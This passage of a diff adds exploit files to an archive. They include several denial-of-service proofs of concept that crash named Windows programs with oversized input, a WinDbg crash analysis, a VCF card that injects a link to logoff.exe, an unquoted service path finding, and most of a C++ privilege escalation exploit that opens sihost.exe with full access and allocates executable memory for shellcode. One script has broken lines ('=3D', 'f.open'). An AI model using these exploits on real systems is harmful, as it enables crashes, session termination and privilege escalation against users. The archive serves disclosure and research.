myfile.close()
|
||||||
|
print("File created")
|
||||||
|
|
||||||
|
# 3.- Open CRASHER.txt and copy content to clipboard
|
||||||
|
# 4.- Open Office Product Key Finder and under the Register tab Click 'Enter Registration Code'
|
||||||
|
# 5.- Paste the content of CRASHER.txt into the Field: 'Name and Key'
|
||||||
|
# 6.- click 'OK' you will see a crash.
|
33
exploits/windows/dos/47868.py
Executable file
33
exploits/windows/dos/47868.py
Executable file
|
@ -0,0 +1,33 @@
|
||||||
|
# Exploit Title: SpotFTP FTP Password Recovery 3.0.0.0 - 'Name' Denial of Service (PoC)
|
||||||
|
# Exploit Author : Ismail Tasdelen
|
||||||
|
# Exploit Date: 2020-01-06
|
||||||
|
# Vendor Homepage : http://www.nsauditor.com/
|
||||||
|
# Link Software : http://www.nsauditor.com/downloads/spotftp_setup.exe
|
||||||
|
# Tested on OS: Windows 10
|
||||||
|
# CVE : N/A
|
||||||
|
|
||||||
|
'''
|
||||||
|
Proof of Concept (PoC):
|
||||||
|
=======================
|
||||||
|
|
||||||
|
1.Download and install SpotFTP
|
||||||
|
2.Run the python operating script that will create a file (poc.txt)
|
||||||
|
3.Run the software "Register -> Enter Registration Code
|
||||||
|
4.Copy and paste the characters in the file (poc.txt)
|
||||||
|
5.Paste the characters in the field 'Name' and click on 'Ok'
|
||||||
|
6.SpotFTP Crashed
|
||||||
|
'''
|
||||||
|
|
||||||
|
#!/usr/bin/python
|
||||||
|
|
||||||
|
buffer = "A" * 1000
|
||||||
|
|
||||||
|
payload = buffer
|
||||||
|
try:
|
||||||
|
f=open("poc.txt","w")
|
||||||
|
print("[+] Creating %s bytes evil payload." %len(payload))
|
||||||
|
f.write(payload)
|
||||||
|
f.close()
|
||||||
|
print("[+] File created!")
|
||||||
|
except:
|
||||||
|
print("File cannot be created.")
|
33
exploits/windows/dos/47869.py
Executable file
33
exploits/windows/dos/47869.py
Executable file
|
@ -0,0 +1,33 @@
|
||||||
|
# Exploit Title: SpotMSN 2.4.6 - 'Name' Denial of Service (PoC)
|
||||||
|
# Exploit Author: Ismail Tasdelen
|
||||||
|
# Exploit Date: 2020-01-06
|
||||||
|
# Vendor Homepage : http://www.nsauditor.com/
|
||||||
|
# Link Software : http://www.nsauditor.com/downloads/spotmsn_setup.exe
|
||||||
|
# Tested on OS: Windows 10
|
||||||
|
# CVE : N/A
|
||||||
|
|
||||||
|
'''
|
||||||
|
Proof of Concept (PoC):
|
||||||
|
=======================
|
||||||
|
|
||||||
|
1.Download and install SpotMSN
|
||||||
|
2.Run the python operating script that will create a file (poc.txt)
|
||||||
|
3.Run the software "Register -> Enter Registration Code
|
||||||
|
4.Copy and paste the characters in the file (poc.txt)
|
||||||
|
5.Paste the characters in the field 'Name' and click on 'Ok'
|
||||||
|
6.SpotMSN Crashed
|
||||||
|
'''
|
||||||
|
|
||||||
|
#!/usr/bin/python
|
||||||
|
|
||||||
|
buffer = "A" * 1000
|
||||||
|
|
||||||
|
payload = buffer
|
||||||
|
try:
|
||||||
|
f=open("poc.txt","w")
|
||||||
|
print("[+] Creating %s bytes evil payload." %len(payload))
|
||||||
|
f.write(payload)
|
||||||
|
f.close()
|
||||||
|
print("[+] File created!")
|
||||||
|
except:
|
||||||
|
print("File cannot be created.")
|
33
exploits/windows/dos/47870.py
Executable file
33
exploits/windows/dos/47870.py
Executable file
|
@ -0,0 +1,33 @@
|
||||||
|
# Exploit Title: SpotIM 2.2 - 'Name' Denial Of Service
|
||||||
|
# Exploit Author : Ismail Tasdelen
|
||||||
|
# Exploit Date: 2020-01-06
|
||||||
|
# Vendor Homepage : http://www.nsauditor.com/
|
||||||
|
# Link Software : http://www.nsauditor.com/downloads/spotim_setup.exe
|
||||||
|
# Tested on OS: Windows 10
|
||||||
|
# CVE : N/A
|
||||||
|
|
||||||
|
'''
|
||||||
|
Proof of Concept (PoC):
|
||||||
|
=======================
|
||||||
|
|
||||||
|
1.Download and install SpotIM
|
||||||
|
2.Run the python operating script that will create a file (poc.txt)
|
||||||
|
3.Run the software "Register -> Enter Registration Code
|
||||||
|
4.Copy and paste the characters in the file (poc.txt)
|
||||||
|
5.Paste the characters in the field 'Name' and click on 'Ok'
|
||||||
|
6.SpotIM Crashed
|
||||||
|
'''
|
||||||
|
|
||||||
|
#!/usr/bin/python
|
||||||
|
|
||||||
|
buffer = "A" * 1000
|
||||||
|
|
||||||
|
payload = buffer
|
||||||
|
try:
|
||||||
|
f=open("poc.txt","w")
|
||||||
|
print("[+] Creating %s bytes evil payload." %len(payload))
|
||||||
|
f.write(payload)
|
||||||
|
f.close()
|
||||||
|
print("[+] File created!")
|
||||||
|
except:
|
||||||
|
print("File cannot be created.")
|
153
exploits/windows/dos/47871.txt
Normal file
153
exploits/windows/dos/47871.txt
Normal file
|
@ -0,0 +1,153 @@
|
||||||
|
# Exploit Title: FTPGetter Professional 5.97.0.223 - Denial of Service (PoC)
|
||||||
|
# Google Dork: N/A
|
||||||
|
# Date: 2020-01-03
|
||||||
|
# Exploit Author: FULLSHADE
|
||||||
|
# Vendor Homepage: https://www.ftpgetter.com/
|
||||||
|
# Software Link: https://www.ftpgetter.com/ftpgetter_pro_setup.exe
|
||||||
|
# Version: v.5.97.0.223
|
||||||
|
# Tested on: Windows 7
|
||||||
|
# CVE : N/A
|
||||||
|
|
||||||
|
==================================================================
|
||||||
|
THE BUG : NULL pointer dereference -> DOS crash
|
||||||
|
==================================================================
|
||||||
|
|
||||||
|
The FTPGetter Professional v.5.97.0.223 FTP client suffers from a
|
||||||
|
NULL pointer dereference vulnerability via the program not properly
|
||||||
|
handling user input when setting the field "Run program" under
|
||||||
|
profile properties, it triggers when executing the profile.
|
||||||
|
|
||||||
|
==================================================================
|
||||||
|
DISCLOSURE : Vendor contacted : MITRE assignment : CVE-2020-5183
|
||||||
|
==================================================================
|
||||||
|
...
|
||||||
|
...
|
||||||
|
==================================================================
|
||||||
|
WINDBG ANALYSIS AFTER SENDING 50,000 'A' BYTES
|
||||||
|
==================================================================
|
||||||
|
|
||||||
|
(b84.e88): Access violation - code c0000005 (first chance)
|
||||||
|
First chance exceptions are reported before any exception handling.
|
||||||
|
This exception may be expected and handled.
|
||||||
|
eax=00000000 ebx=0255d3a0 ecx=04000000 edx=00000030 esi=00000000 edi=00000001
|
||||||
|
eip=00855994 esp=0012fbd0 ebp=0012fc6c iopl=0 nv up ei pl zr na pe nc
|
||||||
|
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
|
||||||
|
*** ERROR: Symbol file could not be found. Defaulted to export symbols for FTPGetter.exe -
|
||||||
|
FTPGetter!Xtermforminitialization$qqrv+0x202d74:
|
||||||
|
00855994 8b5004 mov edx,dword ptr [eax+4] ds:0023:00000004=????????
|
||||||
|
|
||||||
|
0:000> !analyze -v
|
||||||
|
*******************************************************************************
|
||||||
|
* *
|
||||||
|
* Exception Analysis *
|
||||||
|
* *
|
||||||
|
*******************************************************************************
|
||||||
|
|
||||||
|
*** ERROR: Symbol file could not be found. Defaulted to export symbols for ftpgcore.dll -
|
||||||
|
Failed calling InternetOpenUrl, GLE=12007
|
||||||
|
|
||||||
|
FAULTING_IP:
|
||||||
|
FTPGetter!Xtermforminitialization$qqrv+202d74
|
||||||
|
00855994 8b5004 mov edx,dword ptr [eax+4]
|
||||||
|
|
||||||
|
EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)
|
||||||
|
ExceptionAddress: 00855994 (FTPGetter!Xtermforminitialization$qqrv+0x00202d74)
|
||||||
|
ExceptionCode: c0000005 (Access violation)
|
||||||
|
ExceptionFlags: 00000000
|
||||||
|
NumberParameters: 2
|
||||||
|
Parameter[0]: 00000000
|
||||||
|
Parameter[1]: 00000004
|
||||||
|
Attempt to read from address 00000004
|
||||||
|
|
||||||
|
FAULTING_THREAD: 00000e88
|
||||||
|
|
||||||
|
PROCESS_NAME: FTPGetter.exe
|
||||||
|
|
||||||
|
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.
|
||||||
|
|
||||||
|
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.
|
||||||
|
|
||||||
|
EXCEPTION_PARAMETER1: 00000000
|
||||||
|
|
||||||
|
EXCEPTION_PARAMETER2: 00000004
|
||||||
|
|
||||||
|
READ_ADDRESS: 00000004
|
||||||
|
|
||||||
|
FOLLOWUP_IP:
|
||||||
|
FTPGetter!Xtermforminitialization$qqrv+202d74
|
||||||
|
00855994 8b5004 mov edx,dword ptr [eax+4]
|
||||||
|
|
||||||
|
MOD_LIST: <ANALYSIS/>
|
||||||
|
|
||||||
|
NTGLOBALFLAG: 0
|
||||||
|
|
||||||
|
APPLICATION_VERIFIER_FLAGS: 0
|
||||||
|
|
||||||
|
BUGCHECK_STR: APPLICATION_FAULT_NULL_CLASS_PTR_DEREFERENCE_NULL_POINTER_READ_INVALID_POINTER_READ
|
||||||
|
|
||||||
|
PRIMARY_PROBLEM_CLASS: NULL_CLASS_PTR_DEREFERENCE
|
||||||
|
|
||||||
|
DEFAULT_BUCKET_ID: NULL_CLASS_PTR_DEREFERENCE
|
||||||
|
|
||||||
|
LAST_CONTROL_TRANSFER: from 00812591 to 00855994
|
||||||
|
|
||||||
|
STACK_TEXT:
|
||||||
|
WARNING: Stack unwind information not available. Following frames may be wrong.
|
||||||
|
0012fc6c 00812591 0085d350 0085d355 0046d181 FTPGetter!Xtermforminitialization$qqrv+0x202d74
|
||||||
|
0012fc8c 0079ffc1 0012fd24 00000000 007a15c2 FTPGetter!Xtermforminitialization$qqrv+0x1bf971
|
||||||
|
0012fcf8 007a2780 0012fdc8 007a278a 0012fd1c FTPGetter!Xtermforminitialization$qqrv+0x14d3a1
|
||||||
|
0012fd1c 0068fda6 00000111 00000030 00000000 FTPGetter!Xtermforminitialization$qqrv+0x14fb60
|
||||||
|
0012fd34 7688c267 001f0320 00000111 00000030 FTPGetter!Xtermforminitialization$qqrv+0x3d186
|
||||||
|
0012fd60 7688c367 00250f60 001f0320 00000111 user32!InternalCallWinProc+0x23
|
||||||
|
0012fdd8 7688c999 00000000 00250f60 001f0320 user32!UserCallWinProcCheckWow+0x14b
|
||||||
|
0012fe38 7688c9f0 00250f60 00000000 001f0320 user32!DispatchMessageWorker+0x357
|
||||||
|
0012fe48 007dec94 0012fe6c 00120100 0012feb8 user32!DispatchMessageW+0xf
|
||||||
|
0012fe64 007decd7 001f0320 00000111 00000030 FTPGetter!Xtermforminitialization$qqrv+0x18c074
|
||||||
|
0012fe88 007df016 0012fe9c 007df020 0012feb8 FTPGetter!Xtermforminitialization$qqrv+0x18c0b7
|
||||||
|
0012feb8 00404674 00000000 00e75048 015c26bb FTPGetter!Xtermforminitialization$qqrv+0x18c3f6
|
||||||
|
0012ff50 00aeae2b 00400000 00000000 015c26bb FTPGetter!_GetExceptDLLinfo+0x112f
|
||||||
|
0012ff88 7509ef3c 7ffdc000 0012ffd4 77003688 FTPGetter!madTraceProcess+0x3cef7
|
||||||
|
0012ff94 77003688 7ffdc000 7702d7f0 00000000 kernel32!BaseThreadInitThunk+0xe
|
||||||
|
0012ffd4 7700365b 004034ec 7ffdc000 00000000 ntdll!__RtlUserThreadStart+0x70
|
||||||
|
0012ffec 00000000 004034ec 7ffdc000 00000000 ntdll!_RtlUserThreadStart+0x1b
|
||||||
|
|
||||||
|
SYMBOL_STACK_INDEX: 0
|
||||||
|
|
||||||
|
SYMBOL_NAME: ftpgetter!Xtermforminitialization$qqrv+202d74
|
||||||
|
|
||||||
|
FOLLOWUP_NAME: MachineOwner
|
||||||
|
|
||||||
|
MODULE_NAME: FTPGetter
|
||||||
|
|
||||||
|
IMAGE_NAME: FTPGetter.exe
|
||||||
|
|
||||||
|
DEBUG_FLR_IMAGE_TIMESTAMP: 5dffa0bd
|
||||||
|
|
||||||
|
STACK_COMMAND: dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; ~0s ; kb
|
||||||
|
|
||||||
|
FAILURE_BUCKET_ID: NULL_CLASS_PTR_DEREFERENCE_c0000005_FTPGetter.exe!Xtermforminitialization$qqrv
|
||||||
|
|
||||||
|
BUCKET_ID: APPLICATION_FAULT_NULL_CLASS_PTR_DEREFERENCE_NULL_POINTER_READ_INVALID_POINTER_READ_ftpgetter!Xtermforminitialization$qqrv+202d74
|
||||||
|
|
||||||
|
WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/FTPGetter_exe/5_97_0_221/5dffa0bd/FTPGetter_exe/5_97_0_221/5dffa0bd/c0000005/00455994.htm?Retriage=1
|
||||||
|
|
||||||
|
Followup: MachineOwner
|
||||||
|
---------
|
||||||
|
|
||||||
|
NULL pointer
|
||||||
|
|
||||||
|
FOLLOWUP_IP:
|
||||||
|
REDftp!Xtermforminitialization$qqrv+202d74
|
||||||
|
00855994 8b5004 mov edx,dword ptr [eax+4]
|
||||||
|
|
||||||
|
Stepping into and running
|
||||||
|
|
||||||
|
eax=04e8fc78 ebx=004db6b4 ecx=0000000a edx=41414141 esi=02871ae0 edi=00000000
|
||||||
|
eip=004db97a esp=04e8fc74 ebp=04e8fec0 iopl=0 nv up ei pl nz ac pe nc
|
||||||
|
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216
|
||||||
|
REDftp!GetFTPValidationW+0x6e842:
|
||||||
|
004db97a 837a5400 cmp dword ptr [edx+54h],0 ds:0023:41414195=????????
|
||||||
|
|
||||||
|
==================================================================
|
||||||
|
CVE-2020-5183 is a NULL pointer dereference vulnerability
|
||||||
|
==================================================================
|
26
exploits/windows/dos/47873.py
Executable file
26
exploits/windows/dos/47873.py
Executable file
|
@ -0,0 +1,26 @@
|
||||||
|
# Exploit Title: Duplicate Cleaner Pro 4 - Denial of Service (PoC)
|
||||||
|
# Date: 2020-01-05
|
||||||
|
# Vendor Homepage:https://www.digitalvolcano.co.uk/index.html
|
||||||
|
# Software Link: https://www.digitalvolcano.co.uk/download/DuplicateCleanerPro4_setup.exe
|
||||||
|
# Exploit Author: Achilles
|
||||||
|
# Tested Version: 4.1.3
|
||||||
|
# Tested on: Windows 7 x64
|
||||||
|
|
||||||
|
|
||||||
|
# 1.- Run python code :
|
||||||
|
# 2.- Open EVIL.txt and copy content to clipboard
|
||||||
|
# 3.- Open Duplicate Cleaner Pro
|
||||||
|
# 4.- Paste the content of EVIL.txt into the Field: 'License key'
|
||||||
|
# 5.- Click 'Activate' and you will see a crash.
|
||||||
|
|
||||||
|
#!/usr/bin/env python
|
||||||
|
buffer =3D "\x41" * 6000
|
||||||
|
|
||||||
|
try:
|
||||||
|
f.open("Evil.txt","w")
|
||||||
|
print "[+] Creating %s bytes evil payload.." %len(buffer)
|
||||||
|
f.write(buffer)
|
||||||
|
f.close()
|
||||||
|
print "[+] File created!"
|
||||||
|
except:
|
||||||
|
print "File cannot be created"
|
93
exploits/windows/dos/47878.txt
Normal file
93
exploits/windows/dos/47878.txt
Normal file
|
@ -0,0 +1,93 @@
|
||||||
|
# Exploit Title: Microsoft Outlook VCF cards - Denial of Service (PoC)
|
||||||
|
# Date: 2020-01-04
|
||||||
|
# Exploit Author: hyp3rlinx
|
||||||
|
# Vendor Homepage: www.microsoft.com
|
||||||
|
|
||||||
|
[+] Credits: John Page (aka hyp3rlinx)
|
||||||
|
[+] Website: hyp3rlinx.altervista.org
|
||||||
|
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-VCF-MAILTO-LINK-DENIAL-OF-SERVICE.txt
|
||||||
|
[+] twitter.com/hyp3rlinx
|
||||||
|
[+] ISR: ApparitionSec
|
||||||
|
|
||||||
|
|
||||||
|
[Vendor]
|
||||||
|
www.microsoft.com
|
||||||
|
|
||||||
|
|
||||||
|
[Product]
|
||||||
|
A VCF file is a standard file format for storing contact information for a person or business.
|
||||||
|
Microsoft Outlook supports the vCard and vCalendar features.
|
||||||
|
These are a powerful new approach to electronic Personal Data Interchange (PDI).
|
||||||
|
|
||||||
|
|
||||||
|
[Vulnerability Type]
|
||||||
|
Mailto Link Denial Of Service
|
||||||
|
|
||||||
|
|
||||||
|
[CVE Reference]
|
||||||
|
N/A
|
||||||
|
|
||||||
|
|
||||||
|
[Security Issue]
|
||||||
|
Windows VCF cards do not properly sanitize email addresses allowing for HTML injection.
|
||||||
|
A corrupt VCF card can cause all the users currently opened files and applications to be closed
|
||||||
|
and their session to be terminated without requiring any accompanying attacker supplied code.
|
||||||
|
|
||||||
|
This can be done by crafting the Mailto link to point to Windows "logoff.exe". The corrupt VCF card can then
|
||||||
|
kill all users applications and also log the target off their computer, if the VCF card is opened in
|
||||||
|
using Windows Contacts and the link is clicked.
|
||||||
|
|
||||||
|
The logoff.exe executable lives in "C:\Windows\System32" and can terminate applications and log out users without requiring args.
|
||||||
|
|
||||||
|
This probably will affect Windows 7 the most as Windows 10 can possibly default opening VCF files in other programs
|
||||||
|
like (People). However, users can possibly still choose to open the VCF in Contacts by right-click the file.
|
||||||
|
|
||||||
|
Note, this exploit requires user interaction.
|
||||||
|
|
||||||
|
[Exploit/POC]
|
||||||
|
"VCF_DoS.py"
|
||||||
|
|
||||||
|
dirty_vcf=(
|
||||||
|
'BEGIN:VCARD\n'
|
||||||
|
'VERSION:4.0\n'
|
||||||
|
'FN:Session Terminate PoC - ApparitionSec\n'
|
||||||
|
'EMAIL:<a href="logoff">DoS@microsoft.com</a>\n'
|
||||||
|
'END:VCARD')
|
||||||
|
|
||||||
|
f=open("DoS.vcf", "w")
|
||||||
|
f.write(dirty_vcf)
|
||||||
|
f.close()
|
||||||
|
|
||||||
|
print "VCF Denial Of Service card created!"
|
||||||
|
print "By hyp3rlinx"
|
||||||
|
|
||||||
|
|
||||||
|
[POC Video URL]
|
||||||
|
https://www.youtube.com/watch?v=P4OGN7pZLSg
|
||||||
|
|
||||||
|
|
||||||
|
[Network Access]
|
||||||
|
Local
|
||||||
|
|
||||||
|
|
||||||
|
[Severity]
|
||||||
|
Medium
|
||||||
|
|
||||||
|
|
||||||
|
[Disclosure Timeline]
|
||||||
|
Vendor Notification: January 2, 2020
|
||||||
|
MSRC : "In order to investigate your report I will need an explanation on how an attacker could use the information
|
||||||
|
to exploit another user remotely without the use of social engineering... As such, this thread is being closed"
|
||||||
|
: January 3, 2020
|
||||||
|
January 4, 2020 : Public Disclosure
|
||||||
|
|
||||||
|
|
||||||
|
[+] Disclaimer
|
||||||
|
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
|
||||||
|
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
|
||||||
|
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
|
||||||
|
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
|
||||||
|
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
|
||||||
|
or exploits by the author or elsewhere. All content (c).
|
||||||
|
|
||||||
|
hyp3rlinx
|
24
exploits/windows/local/47852.txt
Normal file
24
exploits/windows/local/47852.txt
Normal file
|
@ -0,0 +1,24 @@
|
||||||
|
#Exploit Title: Adaware Web Companion 4.9.2159 - 'WCAssistantService' Unquoted Service Path
|
||||||
|
#Exploit Author : ZwX
|
||||||
|
#Exploit Date: 2020-01-05
|
||||||
|
#Vendor Homepage : http://webcompanion.com/
|
||||||
|
#Link Software : http://webcompanion.com/LP-WC002/index.php?partner=LU150701WEBDIRECT&campaign=www.doc2pdf.com&search=2&homepage=2&bd=2
|
||||||
|
#Tested on OS: Windows 10
|
||||||
|
|
||||||
|
|
||||||
|
#Analyze PoC :
|
||||||
|
==============
|
||||||
|
|
||||||
|
C:\Users\ZwX>sc qc WCAssistantService
|
||||||
|
[SC] QueryServiceConfig réussite(s)
|
||||||
|
|
||||||
|
SERVICE_NAME: WCAssistantService
|
||||||
|
TYPE : 10 WIN32_OWN_PROCESS
|
||||||
|
START_TYPE : 2 AUTO_START
|
||||||
|
ERROR_CONTROL : 1 NORMAL
|
||||||
|
BINARY_PATH_NAME : C:\Program Files\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe
|
||||||
|
LOAD_ORDER_GROUP :
|
||||||
|
TAG : 0
|
||||||
|
DISPLAY_NAME : WC Assistant
|
||||||
|
DEPENDENCIES :
|
||||||
|
SERVICE_START_NAME : LocalSystem
|
270
exploits/windows/local/47880.cc
Normal file
270
exploits/windows/local/47880.cc
Normal file
|
@ -0,0 +1,270 @@
|
||||||
|
// Axel '0vercl0k' Souchet - December 28 2019
|
||||||
|
// References:
|
||||||
|
// - Found by an anonymous researcher, written up by Simon '@HexKitchen' Zuckerbraun
|
||||||
|
// - https://www.zerodayinitiative.com/blog/2019/12/19/privilege-escalation-via-the-core-shell-com-registrar-object
|
||||||
|
// - https://github.com/microsoft/Windows-classic-samples/blob/master/Samples/Win7Samples/com/fundamentals/dcom/simple/sserver/sserver.cpp
|
||||||
|
// - https://github.com/microsoft/Windows-classic-samples/blob/master/Samples/Win7Samples/com/fundamentals/dcom/simple/sclient/sclient.cpp
|
||||||
|
|
||||||
|
#include <windows.h>
|
||||||
|
#include <cstdint>
|
||||||
|
#include <atlbase.h>
|
||||||
|
|
||||||
|
// 54E14197-88B0-442F-B9A3-86837061E2FB
|
||||||
|
// .rdata:0000000000014108 CLSID_CoreShellComServerRegistrar dd 54E14197h ; Data1
|
||||||
|
// .rdata:0000000000014108 dw 88B0h ; Data2
|
||||||
|
// .rdata:0000000000014108 dw 442Fh ; Data3
|
||||||
|
// .rdata:0000000000014108 db 0B9h, 0A3h, 86h, 83h, 70h, 61h, 0E2h, 0FBh ; Data4
|
||||||
|
const GUID CLSID_CoreShellComServerRegistrar = {
|
||||||
|
0x54e14197, 0x88b0, 0x442f, {
|
||||||
|
0xb9, 0xa3, 0x86, 0x83, 0x70, 0x61, 0xe2, 0xfb
|
||||||
|
}};
|
||||||
|
|
||||||
|
// 27EB33A5-77F9-4AFE-AE056-FDBBE720EE7
|
||||||
|
// .rdata:00000000000140B8 GuidICOMServerRegistrar dd 27EB33A5h ; Data1
|
||||||
|
// .rdata:00000000000140B8 dw 77F9h ; Data2
|
||||||
|
// .rdata:00000000000140B8 dw 4AFEh ; Data3
|
||||||
|
// .rdata:00000000000140B8 db 0AEh, 5, 6Fh, 0DBh, 0BEh, 72h, 0Eh, 0E7h ; Data4
|
||||||
|
MIDL_INTERFACE("27EB33A5-77F9-4AFE-AE05-6FDBBE720EE7")
|
||||||
|
ICoreShellComServerRegistrar : public IUnknown {
|
||||||
|
// 0:015> dqs 00007ff8`3fe526e8
|
||||||
|
// [...]
|
||||||
|
// 00007ff8`3fe52730 00007ff8`3fe4a5e0 CoreShellExtFramework!Microsoft::WRL::Details::RuntimeClassImpl<Microsoft::WRL::RuntimeClassFlags<2>,1,0,0,Microsoft::WRL::FtmBase,CServiceHostComponentWithGITSite,IOSTaskCompletionRevokedHandler,ICOMServerRegistrar>::QueryInterface
|
||||||
|
// 00007ff8`3fe52738 00007ff8`3fe4a6d0 CoreShellExtFramework!Microsoft::WRL::Details::RuntimeClassImpl<Microsoft::WRL::RuntimeClassFlags<2>,1,0,0,Microsoft::WRL::FtmBase,CServiceHostComponentWithGITSite,IOSTaskCompletionRevokedHandler,ICOMServerRegistrar>::AddRef
|
||||||
|
// 00007ff8`3fe52740 00007ff8`3fe4a680 CoreShellExtFramework!Microsoft::WRL::Details::RuntimeClassImpl<Microsoft::WRL::RuntimeClassFlags<2>,1,0,0,Microsoft::WRL::FtmBase,CServiceHostComponentWithGITSite,IOSTaskCompletionRevokedHandler,ICOMServerRegistrar>::Release
|
||||||
|
// 00007ff8`3fe52748 00007ff8`3fe47260 CoreShellExtFramework!CoreShellComServerRegistrar::RegisterCOMServer
|
||||||
|
// 00007ff8`3fe52750 00007ff8`3fe476b0 CoreShellExtFramework!CoreShellComServerRegistrar::UnregisterCOMServer
|
||||||
|
// 00007ff8`3fe52758 00007ff8`3fe477f0 CoreShellExtFramework!CoreShellComServerRegistrar::DuplicateHandle
|
||||||
|
// 00007ff8`3fe52760 00007ff8`3fe47920 CoreShellExtFramework!CoreShellComServerRegistrar::OpenProcess
|
||||||
|
virtual HRESULT STDMETHODCALLTYPE RegisterCOMServer() = 0;
|
||||||
|
virtual HRESULT STDMETHODCALLTYPE UnregisterCOMServer() = 0;
|
||||||
|
virtual HRESULT STDMETHODCALLTYPE DuplicateHandle() = 0;
|
||||||
|
virtual HRESULT STDMETHODCALLTYPE OpenProcess(
|
||||||
|
const uint32_t DesiredAccess,
|
||||||
|
const bool InheritHandle,
|
||||||
|
const uint32_t ArbitraryPid,
|
||||||
|
const uint32_t TargetProcessId,
|
||||||
|
HANDLE *ProcessHandle
|
||||||
|
) = 0;
|
||||||
|
};
|
||||||
|
|
||||||
|
struct Marshalled_t {
|
||||||
|
uint32_t Meow;
|
||||||
|
uint32_t ObjRefType;
|
||||||
|
GUID IfaceId;
|
||||||
|
uint32_t Flags;
|
||||||
|
uint32_t References;
|
||||||
|
uint64_t Oxid;
|
||||||
|
uint64_t Oid;
|
||||||
|
union {
|
||||||
|
uint64_t IfacePointerIdLow;
|
||||||
|
struct {
|
||||||
|
uint64_t _Dummy1 : 32;
|
||||||
|
uint64_t ServerPid : 16;
|
||||||
|
};
|
||||||
|
};
|
||||||
|
|
||||||
|
uint64_t IfacePointerIdHigh;
|
||||||
|
};
|
||||||
|
|
||||||
|
int main() {
|
||||||
|
|
||||||
|
//
|
||||||
|
// Initialize COM.
|
||||||
|
//
|
||||||
|
|
||||||
|
HRESULT Hr = CoInitialize(nullptr);
|
||||||
|
if(FAILED(Hr)) {
|
||||||
|
printf("Failed to initialize COM.\nThis might be the best thing that happened in your life, carry on and never look back.");
|
||||||
|
return EXIT_FAILURE;
|
||||||
|
}
|
||||||
|
|
||||||
|
//
|
||||||
|
// Instantiate an out-of-proc instance of `ICoreShellComServerRegistrar`.
|
||||||
|
//
|
||||||
|
|
||||||
|
CComPtr<ICoreShellComServerRegistrar> ComServerRegistrar;
|
||||||
|
Hr = ComServerRegistrar.CoCreateInstance(
|
||||||
|
CLSID_CoreShellComServerRegistrar,
|
||||||
|
nullptr,
|
||||||
|
CLSCTX_LOCAL_SERVER
|
||||||
|
);
|
||||||
|
|
||||||
|
if(FAILED(Hr)) {
|
||||||
|
printf("You are probably not vulnerable (%08x) bailing out.", Hr);
|
||||||
|
return EXIT_FAILURE;
|
||||||
|
}
|
||||||
|
|
||||||
|
//
|
||||||
|
// We don't use the copy ctor here to avoid leaking the object as the returned
|
||||||
|
// stream already has its refcount bumped by `SHCreateMemStream`.
|
||||||
|
//
|
||||||
|
|
||||||
|
CComPtr<IStream> Stream;
|
||||||
|
Stream.Attach(SHCreateMemStream(nullptr, 0));
|
||||||
|
|
||||||
|
//
|
||||||
|
// Get the marshalled data for the `ICoreShellComServerRegistrar` interface, so
|
||||||
|
// that we can extract the PID of the COM server (sihost.exe) in this case.
|
||||||
|
// https://twitter.com/tiraniddo/status/1208073552282488833
|
||||||
|
//
|
||||||
|
|
||||||
|
Hr = CoMarshalInterface(
|
||||||
|
Stream,
|
||||||
|
__uuidof(ICoreShellComServerRegistrar),
|
||||||
|
ComServerRegistrar,
|
||||||
|
MSHCTX_LOCAL,
|
||||||
|
nullptr,
|
||||||
|
MSHLFLAGS_NORMAL
|
||||||
|
);
|
||||||
|
|
||||||
|
if(FAILED(Hr)) {
|
||||||
|
printf("Failed to marshal the interface (%08x) bailing out.", Hr);
|
||||||
|
return EXIT_FAILURE;
|
||||||
|
}
|
||||||
|
|
||||||
|
//
|
||||||
|
// Read the PID out of the blob now.
|
||||||
|
//
|
||||||
|
|
||||||
|
const LARGE_INTEGER Origin {};
|
||||||
|
Hr = Stream->Seek(Origin, STREAM_SEEK_SET, nullptr);
|
||||||
|
|
||||||
|
uint8_t Buffer[0x1000] {};
|
||||||
|
Hr = Stream->Read(Buffer, sizeof(Buffer), nullptr);
|
||||||
|
|
||||||
|
union {
|
||||||
|
Marshalled_t *Blob;
|
||||||
|
void *Raw;
|
||||||
|
} Ptr;
|
||||||
|
|
||||||
|
Ptr.Raw = Buffer;
|
||||||
|
const uint32_t SihostPid = Ptr.Blob->ServerPid;
|
||||||
|
|
||||||
|
//
|
||||||
|
// Ready to get a `PROCESS_ALL_ACCESS` handle to the server now!
|
||||||
|
//
|
||||||
|
|
||||||
|
HANDLE ProcessHandle;
|
||||||
|
Hr = ComServerRegistrar->OpenProcess(
|
||||||
|
PROCESS_ALL_ACCESS,
|
||||||
|
false,
|
||||||
|
SihostPid,
|
||||||
|
GetCurrentProcessId(),
|
||||||
|
&ProcessHandle
|
||||||
|
);
|
||||||
|
|
||||||
|
if(FAILED(Hr)) {
|
||||||
|
printf("Failed to OpenProcess (%08x) bailing out.", Hr);
|
||||||
|
return EXIT_FAILURE;
|
||||||
|
}
|
||||||
|
|
||||||
|
//
|
||||||
|
// Allocate executable memory in the target.
|
||||||
|
//
|
||||||
|
|
||||||
|
const auto ShellcodeAddress = LPTHREAD_START_ROUTINE(VirtualAllocEx(
|
||||||
|
ProcessHandle,
|
||||||
|
nullptr,
|
||||||
|
0x1000,
|
||||||
|
MEM_COMMIT | MEM_RESERVE,
|
||||||
|
PAGE_EXECUTE_READWRITE
|
||||||
|
));
|
||||||
|
|
||||||
|
if(ShellcodeAddress == nullptr) {
|
||||||
|
printf("Failed to VirtualAllocEx memory in the target process (%d) bailing out.", GetLastError());
|
||||||
|
return EXIT_FAILURE;
|
||||||
|
}
|
||||||
|
|
||||||
|
//
|
||||||
|
